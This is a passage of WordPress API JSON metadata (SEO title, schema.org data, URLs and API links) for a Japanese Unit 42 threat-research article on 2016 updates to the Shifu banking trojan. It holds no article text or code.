-->","yoast_head_json":{"title":"Shifu\u30d0\u30f3\u30ad\u30f3\u30b0\u578b\u30c8\u30ed\u30a4\u306e\u6728\u99ac\u306e2016\u5e74\u306e\u66f4\u65b0","description":"\u6982\u8981","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/unit42.paloaltonetworks.com\/ja\/unit42-2016-updates-shifu-banking-trojan\/","og_locale":"ja_JP","og_type":"article","og_title":"Shifu\u30d0\u30f3\u30ad\u30f3\u30b0\u578b\u30c8\u30ed\u30a4\u306e\u6728\u99ac\u306e2016\u5e74\u306e\u66f4\u65b0","og_description":"\u6982\u8981","og_url":"https:\/\/unit42.paloaltonetworks.com\/ja\/unit42-2016-updates-shifu-banking-trojan\/","og_site_name":"Unit 42","article_published_time":"2017-01-06T20:00:36+00:00","article_modified_time":"2020-04-27T04:49:58+00:00","og_image":[{"width":650,"height":300,"url":"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/04\/unit42-web-banner-650x300-1.jpg","type":"image\/jpeg"}],"author":"Unit 42","twitter_card":"summary_large_image","schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/unit42-2016-updates-shifu-banking-trojan\/#article","isPartOf":{"@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/unit42-2016-updates-shifu-banking-trojan\/"},"author":{"name":"Unit 
42","@id":"https:\/\/unit42.paloaltonetworks.com\/#\/schema\/person\/a891f81d18648a1e0bab742238d31a63"},"headline":"Shifu\u30d0\u30f3\u30ad\u30f3\u30b0\u578b\u30c8\u30ed\u30a4\u306e\u6728\u99ac\u306e2016\u5e74\u306e\u66f4\u65b0","datePublished":"2017-01-06T20:00:36+00:00","dateModified":"2020-04-27T04:49:58+00:00","mainEntityOfPage":{"@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/unit42-2016-updates-shifu-banking-trojan\/"},"wordCount":1369,"commentCount":0,"image":{"@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/unit42-2016-updates-shifu-banking-trojan\/#primaryimage"},"thumbnailUrl":"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/04\/unit42-web-banner-650x300-1.jpg","keywords":["banking","Shifu","threat research","Trojan"],"articleSection":["Cybercrime","\u30b5\u30a4\u30d0\u30fc\u72af\u7f6a","\u30de\u30eb\u30a6\u30a7\u30a2","\u8105\u5a01\u30ea\u30b5\u30fc\u30c1"],"inLanguage":"ja","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/unit42.paloaltonetworks.com\/ja\/unit42-2016-updates-shifu-banking-trojan\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/unit42-2016-updates-shifu-banking-trojan\/","url":"https:\/\/unit42.paloaltonetworks.com\/ja\/unit42-2016-updates-shifu-banking-trojan\/","name":"Shifu\u30d0\u30f3\u30ad\u30f3\u30b0\u578b\u30c8\u30ed\u30a4\u306e\u6728\u99ac\u306e2016\u5e74\u306e\u66f4\u65b0","isPartOf":{"@id":"https:\/\/unit42.paloaltonetworks.com\/#website"},"primaryImageOfPage":{"@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/unit42-2016-updates-shifu-banking-trojan\/#primaryimage"},"image":{"@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/unit42-2016-updates-shifu-banking-trojan\/#primaryimage"},"thumbnailUrl":"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/04\/unit42-web-banner-650x300-1.jpg","datePublished":"2017-01-06T20:00:36+00:00","dateModified":"2020-04-27T04:49:58+00:00","author":{"@id":"https:\/\/unit42.paloaltonetworks.com\/#\/
schema\/person\/a891f81d18648a1e0bab742238d31a63"},"description":"\u6982\u8981","breadcrumb":{"@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/unit42-2016-updates-shifu-banking-trojan\/#breadcrumb"},"inLanguage":"ja","potentialAction":[{"@type":"ReadAction","target":["https:\/\/unit42.paloaltonetworks.com\/ja\/unit42-2016-updates-shifu-banking-trojan\/"]}]},{"@type":"ImageObject","inLanguage":"ja","@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/unit42-2016-updates-shifu-banking-trojan\/#primaryimage","url":"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/04\/unit42-web-banner-650x300-1.jpg","contentUrl":"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/04\/unit42-web-banner-650x300-1.jpg","width":650,"height":300},{"@type":"BreadcrumbList","@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/unit42-2016-updates-shifu-banking-trojan\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/unit42.paloaltonetworks.com\/ja\/"},{"@type":"ListItem","position":2,"name":"Shifu\u30d0\u30f3\u30ad\u30f3\u30b0\u578b\u30c8\u30ed\u30a4\u306e\u6728\u99ac\u306e2016\u5e74\u306e\u66f4\u65b0"}]},{"@type":"WebSite","@id":"https:\/\/unit42.paloaltonetworks.com\/#website","url":"https:\/\/unit42.paloaltonetworks.com\/","name":"Unit 42","description":"Palo Alto Networks","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/unit42.paloaltonetworks.com\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"ja"},{"@type":"Person","@id":"https:\/\/unit42.paloaltonetworks.com\/#\/schema\/person\/a891f81d18648a1e0bab742238d31a63","name":"Unit 
42","image":{"@type":"ImageObject","inLanguage":"ja","@id":"https:\/\/unit42.paloaltonetworks.com\/#\/schema\/person\/image\/4ffb3c2d260a0150fb91b3715442f8b3","url":"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2018\/11\/unit-news-meta.svg","contentUrl":"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2018\/11\/unit-news-meta.svg","caption":"Unit 42"},"url":"https:\/\/unit42.paloaltonetworks.com\/ja\/author\/unit42\/"}]}},"_links":{"self":[{"href":"https:\/\/unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/posts\/106805","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/users\/23"}],"replies":[{"embeddable":true,"href":"https:\/\/unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/comments?post=106805"}],"version-history":[{"count":6,"href":"https:\/\/unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/posts\/106805\/revisions"}],"predecessor-version":[{"id":106813,"href":"https:\/\/unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/posts\/106805\/revisions\/106813"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/media\/106755"}],"wp:attachment":[{"href":"https:\/\/unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/media?parent=106805"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/categories?post=106805"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/tags?post=106805"},{"taxonomy":"product_categories","embeddable":true,"href":"https:\/\/unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/product_categories?post=106805"},{"taxonomy":"author","embeddable":true,"href":"https:\/\/unit42.paloal
tonetworks.com\/ja\/wp-json\/wp\/v2\/coauthors?post=106805"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}